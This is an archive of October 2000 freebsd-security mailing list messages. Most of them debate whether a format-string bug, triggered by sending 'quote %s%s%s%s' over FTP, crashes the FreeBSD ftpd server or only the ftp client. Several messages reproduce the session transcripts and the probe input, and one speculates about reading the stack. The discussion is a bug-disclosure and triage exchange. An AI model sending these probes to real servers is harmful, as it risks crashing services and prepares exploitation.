you need to run your ftp client in passive mode. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:10:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AEAD537B66C for ; Mon, 2 Oct 2000 11:10:04 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92IA2I03473; Mon, 2 Oct 2000 12:10:03 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA13194; Mon, 2 Oct 2000 12:10:02 -0600 (MDT) Message-Id: <200010021810.MAA13194@harmony.village.org> To: Garance A Drosihn Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 13:45:46 EDT." References: <008b01c02a71$6b8938c0$d04379a5@p4f0i0> <200009292349.TAA07263@giganda.komkon.org> <200009302123.PAA13609@harmony.village.org> Date: Mon, 02 Oct 2000 12:10:02 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Garance A Drosihn writes: : disclaimer: I'm not offering to do any work, of course, I'm just : suggesting things for whoever IS willing to do the work... :-) OK. I think that this is 20 lines of code in bsd.port.mk, the question is which 20 lines[*]. 
No matter what I'd do, you could override it on a per-port basis (e.g., I don't want any ports that are more dangerous than X, but please let me install pine or sendmail or netcat or xlock or zip anyway). The question is how to do this. Do we want to have this enshrined in /etc/make.conf (or more generally the global build environment)? Or do we want this handled like things are now, in the local build environment of the individual port? A global solution would look like:
OVERRIDE_SECURITY_CHECKS="mail/pine archivers/zip astro/xearth"
and that way you don't have to remember each time you build the port. A local solution would look like:
cd /usr/ports/cad/felt
make OVERRIDE_SECURITY_CHECKS=yes install clean
Note, OVERRIDE_SECURITY_CHECKS is likely a bad name, but it illustrates the question I'm trying to get answered. Warner [*] "The trouble so of two people didn't amount to a hill of beans in this world. But it was our hill and they were our beans." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:18:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 8C0ED37B66C for ; Mon, 2 Oct 2000 11:18:43 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07584 for ; Mon, 2 Oct 2000 12:18:32 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002113441.04932240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:18:25 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: ftpd bug in FreeBSD through at least 3.4 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've received LOTS of anonymous FTP login attempts on the
FreeBSD boxen I administer, and have been wondering why. Perhaps this message explains it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch up until at least 3.4-RELEASE (maybe later). Am not sure to what extent this bug can be exploited. At best, it would probably just let someone run things as the user "ftp" (the euid used for anonymous FTP logins). This might make it possible to finesse a known local root exploit into a remote one, and/or to start an automated password cracking process (a la the RTM worm) on the system. At worst, it might be possible to parlay it into something worse. --Brett >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by > lists.securityfocus.com (Postfix) with SMTP id 259D024C7F5 for > ; Mon, 2 Oct 2000 08:27:37 -0700 > (PDT) >Received: (qmail 21295 invoked by alias); 2 Oct 2000 15:29:30 -0000 >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM >Received: (qmail 21292 invoked from network); 2 Oct 2000 15:29:29 -0000 >Received: from unknown (HELO mail.multigroup-bg.com) (212.36.2.250) by > mail.securityfocus.com with SMTP; 2 Oct 2000 15:29:29 -0000 >Received: from mgoracle2000 ([192.168.32.220]) by mail.multigroup-bg.com > (8.9.3/8.9.3) with SMTP id SAA32372 for ; > Mon, 2 Oct 2000 18:28:32 +0300 >MIME-Version: 1.0 >Content-Type: text/plain; charset="iso-8859-1" >Content-Transfer-Encoding: 8bit >X-Priority: 3 >X-MSMail-Priority: Normal >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 >X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 >Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000> >Date: Mon, 2 Oct 2000 18:28:26 +0200 >Reply-To: Javor Ninov >Sender: Bugtraq List >From: Javor Ninov >Organization: MG Bulgaria >Subject: Wu-ftpd 2.6.1(1) >To: BUGTRAQ@SECURITYFOCUS.COM >X-UIDL: 34a5d41e2d991fbaee20ab8924544a45 > >somewhere:/$ ftp 127.0.0.1 >Connected to 1127.0.0.1. 
>220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
>EEST 2000) ready.
>Name (0:somebody): ftp
>331 Guest login ok, send your complete e-mail address as password.
>Password:
>230-Welcome, archive user! This is an experimental FTP server. If have any
>230-unusual problems, please report them via e-mail to
>root@somewhere.in.internet
>230-If you do have problems, please try using a dash (-) as the first
>character
>230-of your password -- this will turn off the continuation messages that
>may
>230-be confusing your ftp client.
>230-
>230 Guest login ok, access restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> quote %s%s%s%s
>500 'TP¿9(NULL)': command not understood.
>ftp>quote %s%s%s%s%s
>Segmentation fault
>somewhere:/$ uname -a
>Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown
>somewhere:/$
>This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 )

From owner-freebsd-security Mon Oct 2 11:23:25 2000
From: Fernando Schapachnik
Date: Mon, 2 Oct 2000 15:24:17 -0300 (ART)
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <200010021824.PAA26733@ns1.via-net-works.net.ar>
In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>

This describes a bug in wu-ftp, not in BSD-ftpd.

Please double check before scaring us all.

Regards!

In an earlier message, Brett Glass wrote:
> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
> I administer, and have been wondering why. Perhaps this message explains
> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
> up until at least 3.4-RELEASE (maybe later).
[...]
> >Connected to 1127.0.0.1.
> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
> >EEST 2000) ready.

Fernando P. Schapachnik
Network Administration
VIA NET.WORKS ARGENTINA S.A.
fernando@via-net-works.net.ar
(54-11) 4323-3333

From owner-freebsd-security Mon Oct 2 11:29:15 2000
From: "Chris D. Faulhaber"
Date: Mon, 2 Oct 2000 14:29:11 -0400
To: Brett Glass
Cc: security@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID: <20001002142911.A25948@pawn.primelocation.net>
In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>

On Mon, Oct 02, 2000 at 12:18:25PM -0600, Brett Glass wrote:
> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
> I administer, and have been wondering why. Perhaps this message explains
> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
> up until at least 3.4-RELEASE (maybe later).
>

The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
and 4.1[.1] don't seem affected.

-----
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Mon Oct 2 11:30:42 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 12:30:08 -0600
To: Fernando Schapachnik
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002122853.04b25e00@localhost>
In-Reply-To: <200010021824.PAA26733@ns1.via-net-works.net.ar>

Fernando:

I did NOT make a mistake. It works in FreeBSD's own ftpd in FreeBSD 3.4
and earlier; maybe some later versions as well.

--Brett

At 12:24 PM 10/2/2000, Fernando Schapachnik wrote:
>This describes a bug in wu-ftp, not in BSD-ftpd.
>
>Please double check before scaring us all.
>
>Regards!
>
>In an earlier message, Brett Glass wrote:
>> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
>> I administer, and have been wondering why. Perhaps this message explains
>> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
>> up until at least 3.4-RELEASE (maybe later).
>[...]
>> >Connected to 1127.0.0.1.
>> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
>> >EEST 2000) ready.
>
>
>
>
>Fernando P. Schapachnik
>Network Administration
>VIA NET.WORKS ARGENTINA S.A.
>fernando@via-net-works.net.ar
>(54-11) 4323-3333

From owner-freebsd-security Mon Oct 2 11:34:21 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 12:33:47 -0600
To: "Chris D. Faulhaber"
Cc: security@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002123113.049344d0@localhost>
In-Reply-To: <20001002142911.A25948@pawn.primelocation.net>

At 12:29 PM 10/2/2000, Chris D. Faulhaber wrote:
>The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
>and 4.1[.1] don't seem affected.

It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
I have tested.

--Brett

From owner-freebsd-security Mon Oct 2 11:41:13 2000
From: Dan Debertin
Date: Mon, 2 Oct 2000 13:42:27 -0500 (CDT)
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>

I realize that there have been quite a few advisories related to wu-ftpd
lately. However, looking at the example you quote below, it looks as if it
is the Linux FTP _client_ that is SEGVing, not the server. Would a server
tell the remote end that it has segfaulted? No.
Run strace on your ftp client, and you'll see the SEGV.

~Dan D.

--
++ Dan Debertin
++ Senior Systems Administrator
++ Bitstream Underground, LLC
++ airboss@bitstream.net
++ (612)321-9290
++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387

On Mon, 2 Oct 2000, Brett Glass wrote:
> >somewhere:/$ ftp 127.0.0.1
> >Connected to 1127.0.0.1.
> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
> >EEST 2000) ready.
> >Name (0:somebody): ftp
> >331 Guest login ok, send your complete e-mail address as password.
> >Password:
> >230-Welcome, archive user! This is an experimental FTP server. If have any
> >230-unusual problems, please report them via e-mail to
> >root@somewhere.in.internet
> >230-If you do have problems, please try using a dash (-) as the first
> >character
> >230-of your password -- this will turn off the continuation messages that
> >may
> >230-be confusing your ftp client.
> >230-
> >230 Guest login ok, access restrictions apply.
> >Remote system type is UNIX.
> >Using binary mode to transfer files.
> >ftp> quote %s%s%s%s
> >500 'TP¿9(NULL)': command not understood.
> >ftp>quote %s%s%s%s%s
> >Segmentation fault
> >somewhere:/$ uname -a
> >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown
> >somewhere:/$
> >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 )
>

From owner-freebsd-security Mon Oct 2 11:43:31 2000
From: Poul-Henning Kamp
Date: Mon, 02 Oct 2000 20:35:59 +0200
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID: <21322.970511759@critter>
In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>

In message <4.3.2.7.2.20001002123113.049344d0@localhost>, Brett Glass writes:
>At 12:29 PM 10/2/2000, Chris D. Faulhaber wrote:
>
>>The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
>>and 4.1[.1] don't seem affected.
>
>It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
>I have tested.

3.4 is a dead branch, 2.x even more so.
--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Mon Oct 2 11:46:05 2000
From: Neil Blakey-Milner
Organization: Sunesi Clinical Systems
Date: Mon, 2 Oct 2000 20:45:26 +0200
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID: <20001002204526.A58098@mithrandr.moria.org>
In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>
X-Operating-System: FreeBSD 3.3-RELEASE i386
X-URL: http://rucus.ru.ac.za/~nbm/

On Mon 2000-10-02 (12:33), Brett Glass wrote:
> At 12:29 PM 10/2/2000, Chris D. Faulhaber wrote:
>
> >The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
> >and 4.1[.1] don't seem affected.
>
> It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
> I have tested.

This is quite cute:

(nbm@futon) /home/nbm> ftp 127.0.0.1
Connected to 127.0.0.1.
220 futon.sunesi.com FTP server (Version 6.00) ready.
Name (127.0.0.1:nbm): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote %s%s%s%s
Segmentation fault

As in, it crashes the ftp client.

A 4.0 ftp client connecting to 'futon' (a 3.3 machine):

(nbm@couch) /home/nbm> ftp futon
Connected to futon.sunesi.com.
220 futon.sunesi.com FTP server (Version 6.00) ready.
Name (futon.sunesi.com:nbm): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quot %s%s%s%s
500 '%S%S%S%S': command not understood.

A 3.4 ftp client to 'futon' also segfaults.

The ftp server doesn't segfault in the cases I've tried.

Neil
--
Neil Blakey-Milner
Sunesi Clinical Systems
nbm@mithrandr.moria.org

From owner-freebsd-security Mon Oct 2 11:50:20 2000
From: James Wyatt
Date: Mon, 2 Oct 2000 13:48:48 -0500 (CDT)
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>

Uh, Brett, the FreeBSD and Linux ftpd differ a *lot*! You'll get more mail.

That aside, this segfaults the client on the command line. Read my lips,
"no new privileges". (Like most of the Pine bugs discussed earlier. (^_^)

It's even easier to duplicate than the original post. You can do it on a
failed login and it needs only one %s to coredump. (Should the FreeBSD
client leave a core file, btw?) Try this:

	goodguy@bsdie-/tmp: ftp 127.1
	Connected to 127.1.
	220 mybox.my.net FTP server (Version 6.00) ready.
	Name (127.1:goodguy): root
	530 User root access denied.
	ftp: Login failed.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> quote %s
	Segmentation fault (core dumped)

Hope this helps clarify things a little.. - Jy@

On Mon, 2 Oct 2000, Brett Glass wrote:
> Date: Mon, 02 Oct 2000 12:18:25 -0600
> From: Brett Glass
> To: security@FreeBSD.ORG
> Subject: ftpd bug in FreeBSD through at least 3.4
>
> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
> I administer, and have been wondering why. Perhaps this message explains
> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
> up until at least 3.4-RELEASE (maybe later).
>
> Am not sure to what extent this bug can be exploited. At best, it would
> probably just let someone run things as the user "ftp" (the euid used for
> anonymous FTP logins). This might make it possible to finesse a known
> local root exploit into a remote one, and/or to start an automated
> password cracking process (a la the RTM worm) on the system. At worst,
> it might be possible to parlay it into something worse.
>
> --Brett
>
>
> >Approved-By: aleph1@SECURITYFOCUS.COM
> >Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000>
> >Date: Mon, 2 Oct 2000 18:28:26 +0200
> >Reply-To: Javor Ninov
> >Sender: Bugtraq List
> >From: Javor Ninov
> >Organization: MG Bulgaria
> >Subject: Wu-ftpd 2.6.1(1)
> >To: BUGTRAQ@SECURITYFOCUS.COM
> >
> >somewhere:/$ ftp 127.0.0.1
> >Connected to 1127.0.0.1.
> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
> >EEST 2000) ready.
> >Name (0:somebody): ftp
> >331 Guest login ok, send your complete e-mail address as password.
> >Password:
> >230-Welcome, archive user! This is an experimental FTP server. If have any
> >230-unusual problems, please report them via e-mail to
> >root@somewhere.in.internet
> >230-If you do have problems, please try using a dash (-) as the first
> >character
> >230-of your password -- this will turn off the continuation messages that
> >may
> >230-be confusing your ftp client.
> >230-
> >230 Guest login ok, access restrictions apply.
> >Remote system type is UNIX.
> >Using binary mode to transfer files.
> >ftp> quote %s%s%s%s
> >500 'TP¿9(NULL)': command not understood.
> >ftp>quote %s%s%s%s%s
> >Segmentation fault
> >somewhere:/$ uname -a
> >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown
> >somewhere:/$
> >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 )
>

From owner-freebsd-security Mon Oct 2 11:50:26 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 12:47:53 -0600
To: Poul-Henning Kamp
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002124607.00df8150@localhost>
In-Reply-To: <21322.970511759@critter>

At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote:

>3.4 is a dead branch, 2.x even more so.
People are still running 3.x, though. LOTS of people.

--Brett

From owner-freebsd-security Mon Oct 2 11:52:23 2000
From: Alex Charalabidis
Date: Mon, 2 Oct 2000 13:51:20 -0500 (CDT)
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>

On Mon, 2 Oct 2000, Brett Glass wrote:
> At 12:29 PM 10/2/2000, Chris D. Faulhaber wrote:
>
> >The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
> >and 4.1[.1] don't seem affected.
>
> It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
> I have tested.
>

Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by
Carlos Eduardo Gorges. I confirmed the bug existed on our 6.00LS too (and
promptly forgot :P). As far as I know, there have been no exploits and
it's not even a DoS since the parent process is unaffected. The default
FreeBSD ftp client crashes before the server process does, so you can only
see the problem with a client on a different OS (oddly enough, the MS-DOS
7 client seems to be the only one that creates no problems at all).
-ac

--
==============================================================
Alex Charalabidis (AC8139)            5050 Poplar Ave, Ste 170
Systems Administrator                       Memphis, TN 38157
WebNet Memphis                                 (901) 432 6000
Author, The Book of IRC              http://www.bookofirc.com/
==============================================================

From owner-freebsd-security Mon Oct 2 11:55:07 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 12:54:46 -0600
To: Dan Debertin
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002124915.00d51820@localhost>

At 12:42 PM 10/2/2000, Dan Debertin wrote:
>I realize that there have been quite a few advisories related to wu-ftpd
>lately. However, looking at the example you quote below, it looks as if it
>is the Linux FTP _client_ that is SEGVing, not the server. Would a server
>tell the remote end that it has segfaulted? No. Run strace on your ftp
>client, and you'll see the SEGV.

Just looked at this, and you seem to be correct. The message does, for
some reason, seem to be originating in the client. This means that while
there is a bug it is not likely to be exploitable. Whew!
--Brett

From owner-freebsd-security Mon Oct 2 11:55:09 2000
From: Poul-Henning Kamp
Date: Mon, 02 Oct 2000 20:54:47 +0200
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID: <21498.970512887@critter>
In-Reply-To: <4.3.2.7.2.20001002124607.00df8150@localhost>

In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes:
>At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote:
>
>>3.4 is a dead branch, 2.x even more so.
>
>People are still running 3.x, though. LOTS of people.

Doesn't change the fact that it's a dead branch.

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
From owner-freebsd-security Mon Oct 2 11:57:59 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 12:57:26 -0600
To: James Wyatt
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002125514.00d13f00@localhost>

James:

You're right! The message is coming from the client (which is good).
However, the client is quite fragile (which is NOT good). I don't know if
it is possible to exploit the client from a hostile server or not.

--Brett

At 12:48 PM 10/2/2000, James Wyatt wrote:
>Uh, Brett, the FreeBSD and Linux ftpd differ a *lot*! You'll get more mail.
>
>That aside, this segfaults the client on the command line. Read my lips,
>"no new privileges". (Like most of the Pine bugs discussed earlier. (^_^)
>
>It's even easier to duplicate than the original post. You can do it on a
>failed login and it needs only one %s to coredump.....
From owner-freebsd-security Mon Oct 2 12:00:41 2000
From: Warner Losh
Date: Mon, 02 Oct 2000 13:00:35 -0600
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <200010021900.NAA13720@harmony.village.org>
In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>

In message <4.3.2.7.2.20001002123113.049344d0@localhost> Brett Glass writes:
: At 12:29 PM 10/2/2000, Chris D. Faulhaber wrote:
:
: >The system's ftp daemon or wu-ftpd?  The ftp daemons installed with 3.5.1
: >and 4.1[.1] don't seem affected.
:
: It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
: I have tested.

Then why doesn't it work with the 3.2 ftpd that I just tested? This bug was
fixed a long time ago. Are you sure you aren't running wu-ftpd?
Warner

From owner-freebsd-security Mon Oct 2 12:15:29 2000
From: Jordan Hubbard
Date: Mon, 02 Oct 2000 12:14:40 -0700
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-ID: <59846.970514080@winston.osd.bsdi.com>
In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>

> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
> I administer, and have been wondering why. Perhaps this message explains
> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
> up until at least 3.4-RELEASE (maybe later).

That's the client crashing, you knob. Read the advisories more closely.
What linux ftp clients do is not all that urgent a concern of ours.
- Jordan

From owner-freebsd-security Mon Oct 2 12:29:54 2000
From: Brett Glass
Date: Mon, 02 Oct 2000 13:28:39 -0600
To: Alex Charalabidis
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Message-Id: <4.3.2.7.2.20001002125825.00de8f00@localhost>

At 12:51 PM 10/2/2000, Alex Charalabidis wrote:
>Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by
>Carlos Eduardo Gorges. I confirmed the bug existed on
>our 6.00LS too (and promptly forgot :P). As far as I know, there have been
>no exploits and it's not even a DoS since the parent process is
>unaffected. The default FreeBSD ftp client crashes before the server
>process does, so you can only see the problem with a client on a different
>OS (oddly enough, the MS-DOS 7 client seems to be the only one that
>creates no problems at all).

Interesting. It appears that my earlier tests were not conclusive because
there were problems in both the server AND the client. Thank you for
pointing this out!

Let's try testing the server with the MS-DOS 7 client, so that any
problems with the FreeBSD FTP client are not a factor.
I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ server
(running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client side:

ftp> quote %s%s%s%s%s
500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood.

This means that while the FreeBSD FTP client crashed (and generated the segfault
message), the server did not crash. However, there's still junk in the message
sent back by the server, which indicates that I may be getting at the stack
here.

What's more, when I do a ps -ax on the server, I see (user and host names changed):

19119 ?? Is 0:00.05 ftpd: host.com: user: \M-8H|\^Cx\M-C\M-8\M-`y\^Cx\M-C\M-8|\^Tquote %s%s%s%s%s(null)%s%s%s%s%s\

Oops! We've got a bit of weirdness on the server side too, though it did not
crash. Can this be exploited?

Now, let's send a command with more %s format directives to the server:

ftp> quote %s%s%s%s%s%s%s%s%s%s
(Nothing)

The ftpd process on the server is alive but seems to be hung parsing the command.
So, something is amiss, but to what extent it is exploitable I can't tell.
It DOES happen even in 4.1, though.

Haven't looked into why the FreeBSD clients from FreeBSD 3.4 and prior crashed.
So, I cannot tell as yet whether a hostile server can do nasty things to them
or not.
--Brett

From owner-freebsd-security Mon Oct 2 12:30:46 2000
From: James Wyatt
To: Poul-Henning Kamp
Cc: Brett Glass, "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 14:22:24 -0500 (CDT)
In-Reply-To: <21498.970512887@critter>

On Mon, 2 Oct 2000, Poul-Henning Kamp wrote:
> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes:
> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote:
> >
> >>3.4 is a dead branch, 2.x even more so.
> >
> >People are still running it 3.x, though. LOTS of people.
>
> Doesn't change the fact that it's a dead branch.

Doesn't change the fact that "LOTS of people" are still running it...
Geez, what a curt, rude, throw-your-hands-up answer.

Are you saying that if we found a terrible bug (not this easy one)
somewhere critical in 3.5.%d, we'd all have to immediately upgrade?
- Jy@

From owner-freebsd-security Mon Oct 2 12:33:14 2000
From: Poul-Henning Kamp
To: James Wyatt
Cc: Brett Glass, "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 02 Oct 2000 21:33:00 +0200
Message-ID: <21970.970515180@critter>

In message , James Wyatt writes:
>On Mon, 2 Oct 2000, Poul-Henning Kamp wrote:
>> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes:
>> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote:
>> >
>> >>3.4 is a dead branch, 2.x even more so.
>> >
>> >People are still running it 3.x, though. LOTS of people.
>>
>> Doesn't change the fact that it's a dead branch.
>
>Doesn't change the fact that "LOTS of people" are still running it...
>Geez, what a curt, rude, throw-your-hands-up answer.
>
>Are you saying that if we found a terrible bug (not this easy one)
>somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@

Yes, I am saying that.

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
From owner-freebsd-security Mon Oct 2 12:37:40 2000
From: Brett Glass
To: Warner Losh
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 02 Oct 2000 13:35:12 -0600
Message-Id: <4.3.2.7.2.20001002133032.00dfb540@localhost>
In-Reply-To: <200010021900.NAA13720@harmony.village.org>

Warner:

There's a problem with bugs in some of the clients, and it's obscuring
problems in the server! See my most recent message to Alex Charalabidis.

--Brett

At 01:00 PM 10/2/2000, Warner Losh wrote:
>In message <4.3.2.7.2.20001002123113.049344d0@localhost> Brett Glass writes:
>: At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote:
>:
>: >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1
>: >and 4.1[.1] don't seem affected.
>:
>: It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
>: I have tested.
>
>Then why doesn't it work with the 3.2 ftpd that I just tested? This bug
>was fixed a long time ago. Are you sure you aren't running wu-ftpd?
>
>Warner

From owner-freebsd-security Mon Oct 2 12:39:34 2000
From: Dmitry Valdov
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 23:39:02 +0400 (MSD)
In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>

Hi!

Please stop it. This is an ftp (NOT FTPD) bug in earlier versions of FreeBSD.
I sent a bug report about six months ago and it was fixed.
I repeat again, it's NOT an ftpd bug. It's an ftp client bug. And it was
fixed about six months ago.

cvsup (or upgrade) is Your friend.

